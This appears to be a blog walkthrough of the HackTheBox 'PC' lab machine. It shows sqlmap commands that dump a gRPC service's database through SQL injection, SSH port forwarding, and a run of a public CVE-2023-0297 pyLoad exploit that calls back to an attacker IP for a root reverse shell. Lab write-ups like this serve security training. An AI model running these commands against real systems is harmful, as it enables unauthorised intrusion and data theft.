I haven’t posted a walkthrough of a HackTheBox machine in a very long time. I recently tackled the “PC” machine on HTB, an easy box with an interesting foothold. This included exploiting a GRPC application which was vulnerable to a SQL injection. After that we had to do a privilege escalation which was achieved by exploiting a vulnerable version of pyLoad.

Initial Access

Let’s start with an NMap scan, in this case we had to use an NMap scan on all ports (-p- parameter) because we need to find a port which is not included in the default 1000 ports:

PORT      STATE SERVICE REASON
22/tcp    open  ssh     syn-ack ttl 63
50051/tcp open  unknown syn-ack ttl 63

Port 22 is not interesting since it requires credentials. However, we are interested in port 50051. After examining what could be running on this port, I discovered it was gRPC. Google has built this piece of software as an open-source high-performance Remote Procedure Call (RPC) framework (https://grpc.io/). RPC is used to let a client in the network execute a certain procedure on the server. So developers have to create an application which implements this procedure on the server.

Using the default tools (e.g. rpcclient and rpcdump) to interact with this RPC server failed. However, it is possible to connect to this gRPC server using a tool called gRPC UI (https://github.com/fullstorydev/grpcui). Install it using: go install github.com/fullstorydev/grpcui/cmd/grpcui@latest and in my case, I had to run it from the ~/go/bin folder, otherwise it would not find it (probably a path issue). Run it using the command: ./grpcui -plaintext <lab's IP>:50051 to connect to the lab’s gRPC server. The gRPC UI application will run a web server on a random port (46075 in my case) which you can visit using your browser.

The web application shows that there is only one service called SimpleApp which has 3 methods:

• LoginUser
• RegisterUser
• getInfo

As the names suggest, it is possible to log in, register a user and get info from a certain ID. Adding your own user is possible and allowed me to scrape all the messages through the getInfo method. This did not result in any interesting information. Continuing the search for gaining initial access, I tried to run SQLMap against all three functions. What I did was capture every POST request using Burp and ran it through SQLMap using this command: sqlmap -r <post request file>. When SQLMap was examining the getInfo method, it found a SQL injection. This SQL injection can be used to dump the whole database using the --dump-all parameter. The database included a username (sau) and password combination which could be used to log in to the machine using SSH.

Privilege Escalation

Now it is time to escalate privileges to root. As always LinPEAS returns a lot of interesting information with many false positives. One thing that alerted me was that two ports are only open for internal use: ports 8000 and 9666. Doing a curl on the machine to port 8000 revealed that there was a web application running on it. To be able to see it in my browser, I had to do port forwarding using SSH. This is rather easy: ssh -L 8000:localhost:8000 sau@10.10.11.214. The -L parameter tells SSH to port forward port 8000 on the remote machine to my local port 8000. This allows me to visit the web application in my web browser.

Unfortunately, the default credentials which pyLoad uses did not work and also not the credentials of sau. Googling on pyLoad exploit resulted in CVE-2023-0297 which was released in January of this year. This is relatively new, so let’s try if this version of pyLoad is also vulnerable. I found a script which exploits this vulnerability (https://github.com/JacobEbben/CVE-2023-0297/blob/main/exploit.py). Inserted the correct parameters: python3 cve-2023-0297.py -t localhost:8000 -I <Attacker's IP> -P <Attacker's Port>. And I got a reverse shell back as the root user.

Conclusion

The box is rooted and we are finished. Especially the initial access part of this machine was interesting and learned a lot about RPC and vulnerabilities in RPC methods. I didn’t know that SQL injections were possible in RPC and definitely during the next pentest when I see RPC methods I will try to exploit them.